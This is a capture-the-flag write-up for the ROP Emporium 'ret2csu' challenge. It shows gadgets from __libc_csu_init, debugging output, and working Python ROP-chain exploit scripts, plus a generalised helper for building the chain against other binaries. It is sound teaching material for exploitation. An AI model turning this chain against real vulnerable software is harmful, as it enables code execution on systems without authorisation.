We’re back in ret2win territory, but this time without the useful gadgets. How will we populate the rdx register without a pop rdx?
The binary and challenge description can be found here:
https://ropemporium.com/challenge/ret2csu.html
While this challenge seems simple on the surface, it required more thought than I had anticipated, mostly because our goal differs from what is described in the challenge description’s recommended reading material. The goal here is simple: call ret2win() with 0xdeadcafebabebeef supplied as the 3rd function argument. For reference, on x64 Linux systems, the first 3 function arguments are passed in the following registers, respectively: RDI, RSI, RDX. The challenge description points you to a PDF describing the return-to-csu technique from BlackHat Asia 2018. While this was great for getting started, especially for finding gadgets that tools like ropper miss, a few extra steps were needed to complete the challenge. You’ll see what I’m talking about later.
The binary simply asks for input:
andrew ~/ret2csu $ ./ret2csu
ret2csu by ROP Emporium
Call ret2win()
The third argument (rdx) must be 0xdeadcafebabebeef
> test
The main hurdle here is getting a specific value into RDX when ropper can’t find any useful gadgets:
andrew ~/ret2csu $ ropper --file ret2csu --search "pop rdx"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop rdx
andrew ~/ret2csu $ ropper --file ret2csu --search "mov rdx"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: mov rdx
The “return-to-csu” paper linked to by the challenge description tells us where to start: the __libc_csu_init() function. This function comes as “attached code” that, in a non-PIE binary like this one, is conveniently not randomized when ASLR is enabled. Let’s take a look at the disassembly in radare2:
Now, one thing that tripped me up for a while here is that radare2 is not displaying all of the instructions. Do you see the two dots in the left margin? There are supposed to be a few instructions forming a loop here. Let’s take a look at the same function in GDB:
For some reason, radare2 is not displaying the following instructions:
0x000000000040088d <+77>: add rbx,0x1
0x0000000000400891 <+81>: cmp rbp,rbx
0x0000000000400894 <+84>: jne 0x400880 <__libc_csu_init+64>
I’ve submitted an issue on GitHub for this. Because of that, I’ll be using GDB’s disassembly, as these instructions will be important later on. For now, let’s get started with building a ROP chain. There are 2 gadgets here to consider. The first one we can use to populate a few registers:
0x000000000040089a <+90>: pop rbx
0x000000000040089b <+91>: pop rbp
0x000000000040089c <+92>: pop r12
0x000000000040089e <+94>: pop r13
0x00000000004008a0 <+96>: pop r14
0x00000000004008a2 <+98>: pop r15
0x00000000004008a4 <+100>: ret
The second can be used to populate a few more registers and call an arbitrary function:
0x0000000000400880 <+64>: mov rdx,r15
0x0000000000400883 <+67>: mov rsi,r14
0x0000000000400886 <+70>: mov edi,r13d
0x0000000000400889 <+73>: call QWORD PTR [r12+rbx*8]
Keep in mind that the primary goal here is to populate the RDX register with 0xdeadcafebabebeef. In order to do that, we’ll need to use that "pop r15" instruction to get that value into R15, followed by the "mov rdx, r15" instruction. Then we have the "call QWORD PTR [r12+rbx*8]" instruction. We can put whatever address we want into R12 and set RBX to 0. So my first thought was, let’s populate RDX with the necessary value and call ret2win(). Easy, right?
#!/usr/bin/env python3
import sys

# Gadgets
# 1) 0x40089a: pop rbx,rbp,r12,r13,r14,r15; ret
# 2) 0x400880: mov rdx,r15; mov rsi,r14; mov edi,r13d; call qword [r12 + rbx*8]

# Pack an integer as an 8-byte little-endian value
p = lambda x: (x).to_bytes(8, "little")

buf = b"A" * 40
buf += p(0x40089a) # Gadget 1
buf += p(0) # RBX
buf += p(0) # RBP
buf += p(0x4007b1) # R12 (ret2win())
buf += p(0) # R13 > RDI
buf += p(0) # R14 > RSI
buf += p(0xdeadcafebabebeef) # R15 > RDX
buf += p(0x400880) # Gadget 2

sys.stdout.buffer.write(buf)
Let’s give it a whirl:
andrew ~/ret2csu $ ./exploit.py | ./ret2csu
ret2csu by ROP Emporium
Call ret2win()
The third argument (rdx) must be 0xdeadcafebabebeef
> Segmentation fault (core dumped)
Of course it isn’t that easy. After doing some debugging and reflecting on my life choices, I realized that the "call QWORD PTR [r12+rbx*8]" instruction isn’t directly calling the address we put in R12. The value “r12+rbx*8” is being dereferenced, so the instruction calls the address that this value points to. So the first thing I tried was searching memory for a location where the address of ret2win() is stored.
[0x004005f0]> f~ret2win
0x004007b1 128 sym.ret2win
0x004008e1 15 str.Call_ret2win
[0x004005f0]> /v 0x4007b1
Searching 3 bytes in [0x601058-0x601080]
hits: 0
Searching 3 bytes in [0x600e10-0x601058]
hits: 0
Searching 3 bytes in [0x400000-0x400ac8]
hits: 0
[0x004005f0]> pxQ 48 @ sym..dynamic
0x00600e20 0x0000000000000001 section.+1
0x00600e28 0x0000000000000001 section.+1
0x00600e30 0x000000000000000c section.+12
0x00600e38 0x0000000000400560 section..init
0x00600e40 0x000000000000000d section.+13
0x00600e48 0x00000000004008b4 section..fini
[0x004005f0]> /v 0x400560
Searching 4 bytes in [0x601058-0x601080]
hits: 0
Searching 4 bytes in [0x600e10-0x601058]
hits: 1
Searching 4 bytes in [0x400000-0x400ac8]
hits: 0
0x00600e38 hit3_0 60054000
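The same kind of search can be sketched in Python. This is only an illustration, not what radare2 does internally: the helper name find_pointers and the toy_dynamic blob are made up for the example, and unlike the 3- and 4-byte searches above it looks for the full 8-byte little-endian pointer. The blob only mimics the tag/value layout seen in the pxQ output.

```python
import struct


def find_pointers(blob: bytes, address: int) -> list[int]:
    """Return every offset in blob where address is stored as a
    little-endian 64-bit value (hypothetical helper for illustration)."""
    needle = struct.pack("<Q", address)
    hits = []
    pos = blob.find(needle)
    while pos != -1:
        hits.append(pos)
        pos = blob.find(needle, pos + 1)
    return hits


# Toy stand-in for four of the .dynamic quadwords shown above:
# tag 0xc -> _init address, tag 0xd -> _fini address.
toy_dynamic = struct.pack("<4Q", 0xC, 0x400560, 0xD, 0x4008B4)

print(find_pointers(toy_dynamic, 0x4008B4))  # stored pointer to _fini()
print(find_pointers(toy_dynamic, 0x4007B1))  # ret2win() is stored nowhere
```

A function is only usable with the "call QWORD PTR [r12+rbx*8]" gadget if a search like this finds its address stored somewhere at a known location.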
Of course, when a search fails, I perform another search that I know should find a match, just to make sure I’m doing it right. As the pxQ output above shows, the .dynamic section holds the addresses of the _init() and _fini() functions. This will be useful knowledge later. For now, let’s go back to the disassembly of __libc_csu_init() and focus on these instructions:
0x0000000000400880 <+64>: mov rdx,r15
0x0000000000400883 <+67>: mov rsi,r14
0x0000000000400886 <+70>: mov edi,r13d
0x0000000000400889 <+73>: call QWORD PTR [r12+rbx*8]
0x000000000040088d <+77>: add rbx,0x1
0x0000000000400891 <+81>: cmp rbp,rbx
0x0000000000400894 <+84>: jne 0x400880 <__libc_csu_init+64>
0x0000000000400896 <+86>: add rsp,0x8
0x000000000040089a <+90>: pop rbx
0x000000000040089b <+91>: pop rbp
0x000000000040089c <+92>: pop r12
0x000000000040089e <+94>: pop r13
0x00000000004008a0 <+96>: pop r14
0x00000000004008a2 <+98>: pop r15
0x00000000004008a4 <+100>: ret
If I can make it from that first instruction to the last, I’ll be able to put whatever I want into RDX and set the next link in my ROP chain to the address of ret2win(). What’ll it take? Well, I’ll need to call a function that doesn’t modify RDX, and I’ll need to make it past that conditional jump. The conditional jump is easy. We’ll set RBP to 1 and RBX to 0. The instructions will add 1 to RBX, then compare the two. If they’re equal, the jump is not taken. My ROP chain will also need to account for the "add rsp,0x8" instruction. That just means adding another 8 bytes of padding to the chain. The rest of the instructions pop values into various registers but do not modify RDX.
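To convince myself of the RBX/RBP values, the three loop instructions can be modelled in a few lines of Python. This is a minimal sketch, and the function name loop_falls_through is made up for the example; it only models "add rbx,0x1; cmp rbp,rbx; jne", with 64-bit wraparound on the add.

```python
MASK64 = (1 << 64) - 1  # registers are 64 bits wide


def loop_falls_through(rbx: int, rbp: int) -> bool:
    """Model `add rbx,0x1; cmp rbp,rbx; jne 0x400880`.

    Returns True when the jne is NOT taken, i.e. execution continues
    to `add rsp,0x8` and the six pops.
    """
    rbx = (rbx + 1) & MASK64        # add rbx,0x1
    return rbx == (rbp & MASK64)    # cmp rbp,rbx ; jne taken if not equal


print(loop_falls_through(rbx=0, rbp=1))  # values planned for the next attempt
print(loop_falls_through(rbx=0, rbp=0))  # values from the first attempt
```

With RBX = 0 and RBP = 1 the jump is not taken; with both set to 0 the code would loop back to 0x400880 and call through [r12+rbx*8] again with RBX = 1.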
Now, which function should I call? I need to make sure the function does not modify RDX, RBX, or RBP. It also needs to be a function whose address is already stored in memory somewhere. Turns out, _fini() does pretty much nothing. And if you remember from earlier, its address is stored in the .dynamic section:
[0x004005f0]> pdf @ sym._fini
;-- section..fini:
;-- .fini:
┌ 9: sym._fini ();
│ bp: 0 (vars 0, args 0)
│ sp: 0 (vars 0, args 0)
│ rg: 0 (vars 0, args 0)
│ 0x004008b4 sub rsp, 8
│ 0x004008b8 add rsp, 8
└ 0x004008bc ret
[0x004005f0]> pxQ 48 @ sym..dynamic
0x00600e20 0x0000000000000001 section.+1
0x00600e28 0x0000000000000001 section.+1
0x00600e30 0x000000000000000c section.+12
0x00600e38 0x0000000000400560 section..init
0x00600e40 0x000000000000000d section.+13
0x00600e48 0x00000000004008b4 section..fini
So the R12 register will need to be populated with the value 0x600e48, the address of the .dynamic entry that holds the pointer to _fini(). Now I should have all the pieces to finish my ROP chain:
#!/usr/bin/env python3
import sys

# Gadgets
# 1) 0x40089a: pop rbx,rbp,r12,r13,r14,r15; ret
# 2) 0x400880: mov rdx,r15; mov rsi,r14; mov edi,r13d; call qword [r12 + rbx*8]

# Pack an integer as an 8-byte little-endian value
p = lambda x: (x).to_bytes(8, "little")

buf = b"A" * 40
buf += p(0x40089a) # Gadget 1
buf += p(0) # RBX
buf += p(1) # RBP
buf += p(0x600e48) # R12 (pointer to _fini())
buf += p(0) # R13 > RDI
buf += p(0) # R14 > RSI
buf += p(0xdeadcafebabebeef) # R15 > RDX
buf += p(0x400880) # Gadget 2
buf += p(0) # padding for "add rsp,0x8" instruction
buf += p(0) # RBX
buf += p(0) # RBP
buf += p(0) # R12
buf += p(0) # R13
buf += p(0) # R14
buf += p(0) # R15
buf += p(0x4007b1) # ret2win()

sys.stdout.buffer.write(buf)
This time, it should work, with or without ASLR 🙂
andrew ~/ret2csu $ cat /proc/sys/kernel/randomize_va_space
2
andrew ~/ret2csu $ ./exploit.py | ./ret2csu
ret2csu by ROP Emporium
Call ret2win()
The third argument (rdx) must be 0xdeadcafebabebeef
> ROPE{a_placeholder_32byte_flag!}
Segmentation fault (core dumped)
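If you want to reuse this layout against another binary, the chain could be wrapped in a small helper along these lines. This is just a sketch: build_ret2csu and its parameter names are my own invention, and it assumes the target’s __libc_csu_init() has the same gadget shape as the one disassembled above (six pops, then the mov/mov/mov/call sequence, with "add rsp,0x8" after the loop). The addresses passed in at the bottom are the ones from this write-up.

```python
import struct


def p64(value: int) -> bytes:
    """Pack an integer as an 8-byte little-endian value."""
    return struct.pack("<Q", value)


def build_ret2csu(offset, pop_gadget, mov_gadget, func_ptr, rdx, target,
                  rdi=0, rsi=0):
    """Hypothetical helper: build the two-stage ret2csu chain.

    func_ptr must be an address that *stores* a pointer to a harmless
    function (here, the .dynamic entry for _fini()). Only the low 32 bits
    of rdi survive, because the gadget uses `mov edi,r13d`.
    """
    chain = b"A" * offset
    chain += p64(pop_gadget)                  # pop rbx..r15; ret
    chain += p64(0) + p64(1)                  # RBX = 0, RBP = 1 (skip the jne)
    chain += p64(func_ptr)                    # R12 -> call [r12 + rbx*8]
    chain += p64(rdi) + p64(rsi) + p64(rdx)   # R13, R14, R15
    chain += p64(mov_gadget)                  # mov rdx,r15; ...; call
    chain += p64(0) * 7                       # add rsp,0x8 padding + six pops
    chain += p64(target)                      # final return address
    return chain


payload = build_ret2csu(
    offset=40,
    pop_gadget=0x40089A,
    mov_gadget=0x400880,
    func_ptr=0x600E48,
    rdx=0xDEADCAFEBABEBEEF,
    target=0x4007B1,
)
print(len(payload))
```

Writing payload to stdout with sys.stdout.buffer.write() should produce the same bytes as the exploit script above.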